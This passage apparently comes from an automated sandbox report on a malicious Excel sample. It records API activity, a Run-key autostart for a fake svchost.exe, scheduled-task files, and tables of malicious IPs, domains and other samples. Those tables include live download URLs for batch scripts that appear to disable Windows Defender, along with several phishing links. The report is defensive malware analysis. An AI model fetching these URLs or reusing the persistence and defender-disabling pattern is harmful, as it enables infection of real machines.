                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 67.27.158.126, 67.26.137.254, 67.26.83.254, 8.253.204.249, 67.26.73.254
                        • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        19:14:49API Interceptor446x Sleep call for process: powershell.exe modified
                        19:14:50API Interceptor1543x Sleep call for process: svchost.exe modified
                        19:15:07API Interceptor45x Sleep call for process: ps.exe modified
                        19:15:11API Interceptor2x Sleep call for process: schtasks.exe modified
                        19:15:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\Users\user\AppData\Roaming\svchost.exe
                        19:15:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\Users\user\AppData\Roaming\svchost.exe

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        172.67.8.238New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                            file.xlsGet hashmaliciousBrowse
                              file.xlsGet hashmaliciousBrowse
                                output.xlsGet hashmaliciousBrowse
                                  SecuriteInfo.com.Heur.20246.xlsGet hashmaliciousBrowse
                                    30689741.xlsGet hashmaliciousBrowse
                                      95773220855.xlsGet hashmaliciousBrowse
                                        MT-000137.xlsGet hashmaliciousBrowse
                                          MOT_507465.xlsGet hashmaliciousBrowse
                                            invoicedelivery20200912toxRG.xlsGet hashmaliciousBrowse
                                              inter.xlsGet hashmaliciousBrowse
                                                machine.xlsGet hashmaliciousBrowse
                                                  urXFLGgIxo.xlsGet hashmaliciousBrowse
                                                    LIST_OF_IDs_FOR_PAYOUT.xlsGet hashmaliciousBrowse
                                                      wHrBhrpp3q.csvGet hashmaliciousBrowse
                                                        wHrBhrpp3q.csvGet hashmaliciousBrowse
                                                          wHrBhrpp3q.csvGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Exploit.Siggen2.64979.3440.xlsGet hashmaliciousBrowse
                                                              file.xlsGet hashmaliciousBrowse
                                                                37.46.150.139spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.139/bat/scriptxls_047e37f7-e236-4c64-9509-11f16943b4e0_mic2_wddisabler.bat
                                                                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.139/bat/scriptxls_3357e6d8-1780-4654-872a-eca3aa375ffd_kingshakes_wdexclusion.bat
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.139/bat/scriptxls_43922847-73c3-4df3-b101-5f9d12f30aed_mic2_wddisabler.bat
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.139/bat/scriptxls_43922847-73c3-4df3-b101-5f9d12f30aed_mic2_wddisabler.bat
                                                                AdviceSlip.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.139/bat/scriptxls_929f596a-b84d-4151-a6b5-c95e07d329c0_frankie777_wddisabler.bat
                                                                Export Order Vene.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.139/bat/scriptxls_d8648b70-66b3-4072-9876-0224b204a193_spicytorben_wdexclusion.bat

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                cutt.lyspetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                AdviceSlip.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                file.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                file.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                file.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                SecuriteInfo.com.Heur.20246.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                30689741.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                95773220855.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                95773220855.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                MT-000137.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                95773220855.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                MT-000137.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                MT-000137.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                ordres de virement .xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                IWAYCHspetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.139
                                                                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.139
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.139
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.139
                                                                AdviceSlip.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.139
                                                                Export Order Vene.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.139
                                                                SimpNet.shGet hashmaliciousBrowse
                                                                • 37.46.150.238
                                                                Rr0veY2Ho5.exeGet hashmaliciousBrowse
                                                                • 37.46.150.211
                                                                product_qoute_6847684898.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.211
                                                                EjtRDKZNkXWoLTE.exeGet hashmaliciousBrowse
                                                                • 37.46.150.60
                                                                ru7co.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.60
                                                                http://37.46.150.184/high/imanGet hashmaliciousBrowse
                                                                • 37.46.150.184
                                                                SWIFT-MTC749892-10-12-20_pdf.exeGet hashmaliciousBrowse
                                                                • 37.46.150.41
                                                                SWIFT COPY.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.41
                                                                PAYMENT DOC.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.41
                                                                ORDER LIST.xlsGet hashmaliciousBrowse
                                                                • 37.46.150.41
                                                                AYnBjTXSlkDlSOE.exeGet hashmaliciousBrowse
                                                                • 37.46.150.41
                                                                gnHtx3VKOGDjoD5.exeGet hashmaliciousBrowse
                                                                • 37.46.150.41
                                                                MOT-1507xls.exeGet hashmaliciousBrowse
                                                                • 37.46.150.41
                                                                TT(12-06-2020).exeGet hashmaliciousBrowse
                                                                • 37.46.150.178
                                                                CLOUDFLARENETUSoutput.xlsGet hashmaliciousBrowse
                                                                • 104.20.139.65
                                                                Rfq 214871_TAWI Catalog.exeGet hashmaliciousBrowse
                                                                • 172.67.144.71
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 104.20.138.65
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 172.67.1.225
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 104.20.138.65
                                                                UaTCQiQ6XK.exeGet hashmaliciousBrowse
                                                                • 162.159.135.232
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                0000098.xlsxGet hashmaliciousBrowse
                                                                • 162.159.135.232
                                                                http://megatech22.com/?pl=1525.c70d7c0b30c7b87e496879cd9715060b&n=aHR0cDovL2RlLmdld2lubmNvZGUubWVnYXRlY2gyMi5jb20vP3Nlc3Npb249NDBkMTUyMjRlNzg3NDFmOTgzYzIyNzcwNGMzOTFjMWMmYWZmX2lkPTIyNSZmcHA9MQ==Get hashmaliciousBrowse
                                                                • 172.67.177.163
                                                                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                                • 172.67.1.225
                                                                https://austalusa.mightymenofdavid.org/787423?bWlrZS5iZWxsQGF1c3RhbHVzYS5jb20=&&mic#8487?bWlrZS5iZWxsQGF1c3RhbHVzYS5jb20=&7523891&7523891&7523891&7523891Get hashmaliciousBrowse
                                                                • 104.26.9.44
                                                                https://doc.clickup.com/p/h/2hm67-99/806f7673f7694a9Get hashmaliciousBrowse
                                                                • 172.67.74.213
                                                                https://daceanevay.com/mailing/index.htmlGet hashmaliciousBrowse
                                                                • 104.16.19.94
                                                                https://bit.ly/3mH4NojGet hashmaliciousBrowse
                                                                • 104.18.37.186
                                                                https://bitly.com/2Xaw8VAGet hashmaliciousBrowse
                                                                • 104.16.18.94
                                                                https://j.mp/3rJBANnGet hashmaliciousBrowse
                                                                • 104.16.18.94
                                                                https://bitly.com/2KZhv4GGet hashmaliciousBrowse
                                                                • 104.16.19.94
                                                                http://delivery.unlocklocks.com/HSOMEU?id=124732=Jx8EBwNQDgsBTwECUwcIUlUBUx0=QgtZWk8ADFsJdkUDDQ9cU1AITVAdXENVHwYOUlwHUlMHUgMPUFtXAVMPTwoQF0QMHktdXV9aR1cRThYXC10MAl4OWlUKEE1XDVscKjcseXNkW1BcT0UD&fl=DBdARkJeFhdeXFVXEVleAwhYDxhRB1tCAA8AVRBTHQELDhtTYg1eVkAcGet hashmaliciousBrowse
                                                                • 172.64.196.24
                                                                DRAFT-KMBT-F33C6592-96F3-4015-8107_IMG.exeGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                December SOA.exeGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                CLOUDFLARENETUSoutput.xlsGet hashmaliciousBrowse
                                                                • 104.20.139.65
                                                                Rfq 214871_TAWI Catalog.exeGet hashmaliciousBrowse
                                                                • 172.67.144.71
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 104.20.138.65
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 172.67.1.225
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 104.20.138.65
                                                                UaTCQiQ6XK.exeGet hashmaliciousBrowse
                                                                • 162.159.135.232
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                0000098.xlsxGet hashmaliciousBrowse
                                                                • 162.159.135.232
                                                                http://megatech22.com/?pl=1525.c70d7c0b30c7b87e496879cd9715060b&n=aHR0cDovL2RlLmdld2lubmNvZGUubWVnYXRlY2gyMi5jb20vP3Nlc3Npb249NDBkMTUyMjRlNzg3NDFmOTgzYzIyNzcwNGMzOTFjMWMmYWZmX2lkPTIyNSZmcHA9MQ==Get hashmaliciousBrowse
                                                                • 172.67.177.163
                                                                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                                • 172.67.1.225
                                                                https://austalusa.mightymenofdavid.org/787423?bWlrZS5iZWxsQGF1c3RhbHVzYS5jb20=&&mic#8487?bWlrZS5iZWxsQGF1c3RhbHVzYS5jb20=&7523891&7523891&7523891&7523891Get hashmaliciousBrowse
                                                                • 104.26.9.44
                                                                https://doc.clickup.com/p/h/2hm67-99/806f7673f7694a9Get hashmaliciousBrowse
                                                                • 172.67.74.213
                                                                https://daceanevay.com/mailing/index.htmlGet hashmaliciousBrowse
                                                                • 104.16.19.94
                                                                https://bit.ly/3mH4NojGet hashmaliciousBrowse
                                                                • 104.18.37.186
                                                                https://bitly.com/2Xaw8VAGet hashmaliciousBrowse
                                                                • 104.16.18.94
                                                                https://j.mp/3rJBANnGet hashmaliciousBrowse
                                                                • 104.16.18.94
                                                                https://bitly.com/2KZhv4GGet hashmaliciousBrowse
                                                                • 104.16.19.94
                                                                http://delivery.unlocklocks.com/HSOMEU?id=124732=Jx8EBwNQDgsBTwECUwcIUlUBUx0=QgtZWk8ADFsJdkUDDQ9cU1AITVAdXENVHwYOUlwHUlMHUgMPUFtXAVMPTwoQF0QMHktdXV9aR1cRThYXC10MAl4OWlUKEE1XDVscKjcseXNkW1BcT0UD&fl=DBdARkJeFhdeXFVXEVleAwhYDxhRB1tCAA8AVRBTHQELDhtTYg1eVkAcGet hashmaliciousBrowse
                                                                • 172.64.196.24
                                                                DRAFT-KMBT-F33C6592-96F3-4015-8107_IMG.exeGet hashmaliciousBrowse
                                                                • 162.159.135.233
                                                                December SOA.exeGet hashmaliciousBrowse
                                                                • 162.159.135.233

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                05af1f5ca1b87cc9cc9b25185115607doutput.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                Shipping Details DHL.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                AdviceSlip.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                PI 99-14.doc__.rtfGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                Archivo.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                QUOTATION FP-240018.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                QUOTATION FP-240018.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                MDYL rj0810666.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                List 2020_12_21 OZV3903.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                Export Order Vene.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                info-122020-40367.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                Invoice S2517158.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                RQ-10375.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                RQ-10375.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                AIRWAY-BILLDELIVERY.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122
                                                                mal.docGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                • 172.67.167.122

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                Category:dropped
                                                                Size (bytes):58936
                                                                Entropy (8bit):7.994797855729196
                                                                Encrypted:true
                                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                Malicious:false
                                                                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):326
                                                                Entropy (8bit):3.106285813472883
                                                                Encrypted:false
                                                                SSDEEP:6:kK+FwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:PkPlE99SNxAhUegeT2
                                                                MD5:05998788F56A7BBEB06542D13D8A67BC
                                                                SHA1:58394F3FEAE625FDCDE3AEC69F718224AF5702DF
                                                                SHA-256:16BA6B0E56F32FA63BECE76B6391C039FBF6D07BB7A4ADD4BB4C923F58B5F654
                                                                SHA-512:B63C45B1E8A33E2B48C31BD6F5968AD4BF83CBDA9274A399BE020A1453B6BC0EC16758253AE0358B2C892EBBD84900CEE37CB47573F7FFA71E3D955889756F52
                                                                Malicious:false
                                                                Preview: p...... .........9......(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                C:\Users\user\AppData\Local\Temp\Cab2C30.tmp
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                Category:dropped
                                                                Size (bytes):58936
                                                                Entropy (8bit):7.994797855729196
                                                                Encrypted:true
                                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                Malicious:false
                                                                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                C:\Users\user\AppData\Local\Temp\F3FE0000
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):147050
                                                                Entropy (8bit):7.950162142222199
                                                                Encrypted:false
                                                                SSDEEP:3072:nPTYbtEJ1euGbs2a7phbXJsrhoOPAnlUH9A1kyWwu:nrYbC1Ubda7pZghPACRyNu
                                                                MD5:0682ADAFB9D821D49526BD1B9BE8F79A
                                                                SHA1:6F0D7D7AF2D8ADB7EB0EBE342D82A34C2E7AFE9F
                                                                SHA-256:9292836FDDC9435A4CD9AB691E968C142E472569B377AEE62FDBCC0AC9051260
                                                                SHA-512:07DDB8680DE3F360FD8F355FC0A9FA566FC4D3E720C6AE717570BF1297D4747ECB77C5DF2E8A6AD5F6B747CC7D018A7BABD8F2122848752E25A42617CEC7CDA5
                                                                Malicious:false
                                                                Preview: ...N.0...H.C.+J\8 ..r.e......=M...<..g...U...DI..~..xfz...x....]V.V..^i.....Oy..L.)a.........l.....U;.Y.R...e.V`..8ZY.hE.... .R4..&.k..K.R....M..B..T.....\;V..|.Q5.!.-E"....H...-Ay.jI...A(l..5U.....R..!.{..5;Lm...~.E..;%#6..*....xAa. ..9.u....VP<....Ki...>.../.a.....V.L.%VY!..wbn..v......R..n/O../..\.XO;...L.......D..xw=f...:.. ...<".a......[.A=%j.....=.CE.-....s..4U...H.+.....|....AL..]....D.'..wf!.@.a.n..>.......PK..........!....-............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                C:\Users\user\AppData\Local\Temp\Tar2C31.tmp
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):152533
                                                                Entropy (8bit):6.31602258454967
                                                                Encrypted:false
                                                                SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                Malicious:false
                                                                Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                C:\Users\user\AppData\Local\Temp\ps.exe
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1163264
                                                                Entropy (8bit):7.915040849931152
                                                                Encrypted:false
                                                                SSDEEP:24576:8mPsVSYhARcvhjuhGThHjY5hl70pJNw77YqXKM345BcyIc:64Yhv8h6dYFwpJ6XJC5H
                                                                MD5:128409D5CB9701CD12600BAF7A623794
                                                                SHA1:5E1F8E2C9421B3F7CABA07AE6BE503D272EBB8EB
                                                                SHA-256:80104E0AD490B44A632A15E5875E7626DB7F35FA94D7AADF19C45A621D75C7E0
                                                                SHA-512:267BBE58582CC95E9C45C05F19DEF1DABC491C1C55F6FD16A82256430AD805CE90B6472D934F42E539A40B99D98509E3E3B5E2A21600EFEAF26BC10E6F698681
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2._..............P..v...H......6.... ........@.. ....................... ............@....................................O.......PE........................................................................... ............... ..H............text...<t... ...v.................. ..`.rsrc...PE.......F...x..............@..@.reloc..............................@..B........................H.......................j..()...........................................0............(....(..........(.....o.....*.....................(.......( ......(!......("......(#....*N..(....o....($....*&..(%....*.s&........s'........s(........s)........s*........*....0...........~....o+....+..*.0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*&..(0....*...0..<........~.....(1.....,!r...p.....(2...o3...s4............~.....
                                                                C:\Users\user\AppData\Local\Temp\tmp121B.tmp
                                                                Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1624
                                                                Entropy (8bit):5.155516511399198
                                                                Encrypted:false
                                                                SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBIOtn:cbhZ7ClNQi/rydbz9I3YODOLNdq36o
                                                                MD5:92780A1AFFA6988AB747662D1E2293D4
                                                                SHA1:4BD18D97C0088C7EEB8471758D2C6E7A7349D912
                                                                SHA-256:1571C2750BB9783C95048926B6256F599C9317551617D0871924D956D4A0A0CB
                                                                SHA-512:F878338A856F4DF7350C7E28F6373651B845C1915BF67C4785C344FC907820F25A4B6B8E37A0E92DD5D9C34CD9399AB553FB36714ABED7278B1584AD264D2020
                                                                Malicious:false
                                                                Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                C:\Users\user\AppData\Local\Temp\tmp71E7.tmp
                                                                Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1624
                                                                Entropy (8bit):5.155516511399198
                                                                Encrypted:false
                                                                SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBIOtn:cbhZ7ClNQi/rydbz9I3YODOLNdq36o
                                                                MD5:92780A1AFFA6988AB747662D1E2293D4
                                                                SHA1:4BD18D97C0088C7EEB8471758D2C6E7A7349D912
                                                                SHA-256:1571C2750BB9783C95048926B6256F599C9317551617D0871924D956D4A0A0CB
                                                                SHA-512:F878338A856F4DF7350C7E28F6373651B845C1915BF67C4785C344FC907820F25A4B6B8E37A0E92DD5D9C34CD9399AB553FB36714ABED7278B1584AD264D2020
                                                                Malicious:false
